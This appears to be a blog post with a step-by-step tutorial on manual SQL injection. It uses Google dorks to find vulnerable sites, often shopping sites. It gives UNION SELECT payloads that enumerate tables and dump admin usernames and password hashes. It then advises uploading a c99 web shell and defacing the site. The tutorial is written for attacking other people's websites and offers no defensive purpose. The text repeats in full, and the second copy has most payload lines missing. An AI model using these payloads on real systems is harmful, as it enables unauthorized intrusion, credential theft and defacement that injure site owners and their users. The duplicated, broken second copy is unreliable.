[TUT] Manual SQL Injection [TUT]
//******************************************************************//
//***********************SQL INJECTION******************************//
//******************************************************************//
1.Introduction
---->At present majority of the website is dynamic i.e they use one of the database such as Ms-Access,MySql,MS-Sql server,Oracle etc to store the information
regarding website users or the other content used by the website.Database is the heart of the present websites.As per my experience most of the time a php website will use mysql and sometimes ms-access while an asp website will use ms-sql server.
2.What is sql injection?
---->In short and plain language Sql injection is the technique to access or modify the database of the website without the administrator rights.
3.Checking for vulneraility
---->For finding the vulnerable website type the following in google
inurl:.php?id=
inurl:.php?product_id= (I personally recommend this as the resulting website are probably some of the those which provide online shopping)
site:.(domain of particualr country) inurl:.php?id=
Now suppose you got a site like :- http://www.victim.com/news.php?id=4
Now to check if it is vulnerable, u would simply add ' in the end of the url so the resulting url will be :- http://www.victim.com/news.php?id=4
'
Now if the site is not vulnerable, it filters and the page loads normally.But if it is vulnerable than it will show something like the following error
-"MySQL Syntax Error By '5'' In News.php on line 15."
Even if the content of the page changes than too it is vulnerable so closely observe the page
4.Find the number of columns
---->Note: --,/* or ; is use to end the query
For finding the number of columns use the ORDER BY command
So the url will look like :- http://www.victim.com/news.php?id=4
order by 1-- (No error)
So i increase it to 2,the query look like :- http://www.victim.com/news.php?id=4
order by 2-- (No error)
Keep on incrementing the order by clause by 1 untill it gives the error.In my case i got the error at http://www.victim.com/news.php?id=4
order by 4--
So it means there are three columns.
5.Find which column contain data of our interest
---->For this we will use UNION command
Since we got the 3 columns our query will look like :- http://www.victim.com/news.php?id=-4
union all select 1,2,3--
Note: Check the url i have used negative mark after "id=".This is done to display only the column name and not the dymanic content like picture or etc
Observe the page you will see the column number displayed.There may be more than one number but its fine you can use any one from them.
Suppose in my case i got the 2.
6.Checking the database version
---->We will use the @@version for this
Since we got the column number 2 our query will be :- http://www.victim.com/news.php?id=-4
union all select 1,@@version,3--
This will give the MySql version.But sometimes it gives error than use unhex(hex(@@version)) at the place of @@version.Remember if you have to use the unhex() function now than you will need it later too.
The version can be 4(or below) or 5(or above).I will discuss the injection for the version 5 and 4 seperately.
----------------------------------------------------------------MySql version 5------------------------------------------------------------------------------
7.Getting the right table name
---->This version has useful function called information_schema.
Our query :- http://www.victim.com/news.php?id=-4
union all select 1,table_name,3 from information_schema.tables--
This will display all the table name in the database.Sometimes there is not enough place to display all the table name so it will display only one table name
In this case we will use limit 0,1 such as :- http://www.victim.com/news.php?id=-4
union all select 1,table_name,3 from information_schema.tables limit 0,1--
Keep on incrementing limit limit by 1 such as limit 1,1 limit 2,1 untill we get the desired table name.
And yeah if u had to use unhex(hex()) while finding version, u will have to do: unhex(hex(table_name))
suppose in our case the the desired table name is admin
8.Getting all the column names of the table which we got in step 7
---->Similiarly for the column name our query will look like
http://www.victim.com/news.php?id=-4
union all select 1,column_name,3 from information_schema.columns where table_name=char(97,100,109,105,110)--
Remember convert the table name into its equivalent ascii.Here 97,100,109,105,110 is the ascii of admin
Use limit if necessary.
Suppose we got the column name :- id,username,password
9.Retrieving the data from the table
---->Now we will get the data of the respected column from the table
For username our query :- http://www.victim.com/news.php?id=-4
union all select 1,username,3 from admin
This will give the username let it be admin
For password our query :- http://www.victim.com/news.php?id=-4
union all select 1,password,3 from admin
This will give password in plain form or sometimes in md5,sha1 hash such as 9F14974D57DE204E37C11AEAC3EE4940.You have to decrypt it.To decrypt Google it
To combine the data of all column in one query we will use the concat function such as following
http://www.victim.com/news.php?id=-4
union all select 1,concat(id,0x3a,username,0x3a,password),3 from admin
Note:0x3a is the ascii of colon(
This will give the data in form 1:admin:9F14974D57DE204E37C11AEAC3EE4940
----------------------------------------------------------------End of version 5-----------------------------------------------------------------------------
----------------------------------------------------------------MySql version 4------------------------------------------------------------------------------
Now say your victim has the MySql version 4 than you wont get the column name and table name as in version 5 as this version dont support information_schema function
So you will have to guess the column name and table name untill you dont get the error.The success depends on luck,hard work and experience
http://www.victim.com/news.php?id=-4
union all select 1,2,3 from user--
Here i guessed the table name admin but i get the error as the table with this name doesnt exist
Again i put the table name as tbluser :- http://www.victim.com/news.php?id=-4
union all select 1,2,3 from tbluser
If the page load normally than the table tbluser exist.Most common table names are admin,users,Tbl_admin,tbluser,companyname_user etc
Now the same way you have to guess the column name untill you dont get the error.
The success depends on luck so better try hard or leave it
----------------------------------------------------------------End of version 4-----------------------------------------------------------------------------
10.What to do next
---->Just login from the username and password which you got from the login tab or check the admin panel if exist.Pls Use proxy to login
Next check if there is any upload option such as image upload for any item,product or whatsoever.If it has one and if it doesnt validate the type of file you upload than you can upload your shell from there.
For php i will recommend c99 shell.From this shell you can change the index(home) page of the victim website.
Thats it you have completely defaced the website................Enjoy!!!!!!!!!!!!!!!!!
******************************************************************************** *****************************************************************************
//******************************************************************//
//***********************SQL INJECTION******************************//
//******************************************************************//
1.Introduction
---->At present majority of the website is dynamic i.e they use one of the database such as Ms-Access,MySql,MS-Sql server,Oracle etc to store the information
regarding website users or the other content used by the website.Database is the heart of the present websites.As per my experience most of the time a php website will use mysql and sometimes ms-access while an asp website will use ms-sql server.
2.What is sql injection?
---->In short and plain language Sql injection is the technique to access or modify the database of the website without the administrator rights.
3.Checking for vulneraility
---->For finding the vulnerable website type the following in google
inurl:.php?id=
inurl:.php?product_id= (I personally recommend this as the resulting website are probably some of the those which provide online shopping)
site:.(domain of particualr country) inurl:.php?id=
Now suppose you got a site like :- http://www.victim.com/news.php?id=4
Now to check if it is vulnerable, u would simply add ' in the end of the url so the resulting url will be :- http://www.victim.com/news.php?id=4
Now if the site is not vulnerable, it filters and the page loads normally.But if it is vulnerable than it will show something like the following error
-"MySQL Syntax Error By '5'' In News.php on line 15."
Even if the content of the page changes than too it is vulnerable so closely observe the page
4.Find the number of columns
---->Note: --,/* or ; is use to end the query
For finding the number of columns use the ORDER BY command
So the url will look like :- http://www.victim.com/news.php?id=4
So i increase it to 2,the query look like :- http://www.victim.com/news.php?id=4
Keep on incrementing the order by clause by 1 untill it gives the error.In my case i got the error at http://www.victim.com/news.php?id=4
So it means there are three columns.
5.Find which column contain data of our interest
---->For this we will use UNION command
Since we got the 3 columns our query will look like :- http://www.victim.com/news.php?id=-4
Note: Check the url i have used negative mark after "id=".This is done to display only the column name and not the dymanic content like picture or etc
Observe the page you will see the column number displayed.There may be more than one number but its fine you can use any one from them.
Suppose in my case i got the 2.
6.Checking the database version
---->We will use the @@version for this
Since we got the column number 2 our query will be :- http://www.victim.com/news.php?id=-4
This will give the MySql version.But sometimes it gives error than use unhex(hex(@@version)) at the place of @@version.Remember if you have to use the unhex() function now than you will need it later too.
The version can be 4(or below) or 5(or above).I will discuss the injection for the version 5 and 4 seperately.
----------------------------------------------------------------MySql version 5------------------------------------------------------------------------------
7.Getting the right table name
---->This version has useful function called information_schema.
Our query :- http://www.victim.com/news.php?id=-4
This will display all the table name in the database.Sometimes there is not enough place to display all the table name so it will display only one table name
In this case we will use limit 0,1 such as :- http://www.victim.com/news.php?id=-4
Keep on incrementing limit limit by 1 such as limit 1,1 limit 2,1 untill we get the desired table name.
And yeah if u had to use unhex(hex()) while finding version, u will have to do: unhex(hex(table_name))
suppose in our case the the desired table name is admin
8.Getting all the column names of the table which we got in step 7
---->Similiarly for the column name our query will look like
http://www.victim.com/news.php?id=-4
Remember convert the table name into its equivalent ascii.Here 97,100,109,105,110 is the ascii of admin
Use limit if necessary.
Suppose we got the column name :- id,username,password
9.Retrieving the data from the table
---->Now we will get the data of the respected column from the table
For username our query :- http://www.victim.com/news.php?id=-4
This will give the username let it be admin
For password our query :- http://www.victim.com/news.php?id=-4
This will give password in plain form or sometimes in md5,sha1 hash such as 9F14974D57DE204E37C11AEAC3EE4940.You have to decrypt it.To decrypt Google it
To combine the data of all column in one query we will use the concat function such as following
http://www.victim.com/news.php?id=-4
Note:0x3a is the ascii of colon(
This will give the data in form 1:admin:9F14974D57DE204E37C11AEAC3EE4940
----------------------------------------------------------------End of version 5-----------------------------------------------------------------------------
----------------------------------------------------------------MySql version 4------------------------------------------------------------------------------
Now say your victim has the MySql version 4 than you wont get the column name and table name as in version 5 as this version dont support information_schema function
So you will have to guess the column name and table name untill you dont get the error.The success depends on luck,hard work and experience
http://www.victim.com/news.php?id=-4
Here i guessed the table name admin but i get the error as the table with this name doesnt exist
Again i put the table name as tbluser :- http://www.victim.com/news.php?id=-4
If the page load normally than the table tbluser exist.Most common table names are admin,users,Tbl_admin,tbluser,companyname_user etc
Now the same way you have to guess the column name untill you dont get the error.
The success depends on luck so better try hard or leave it
----------------------------------------------------------------End of version 4-----------------------------------------------------------------------------
10.What to do next
---->Just login from the username and password which you got from the login tab or check the admin panel if exist.Pls Use proxy to login
Next check if there is any upload option such as image upload for any item,product or whatsoever.If it has one and if it doesnt validate the type of file you upload than you can upload your shell from there.
For php i will recommend c99 shell.From this shell you can change the index(home) page of the victim website.
Thats it you have completely defaced the website................Enjoy!!!!!!!!!!!!!!!!!
******************************************************************************** *****************************************************************************
0 comments:
Post a Comment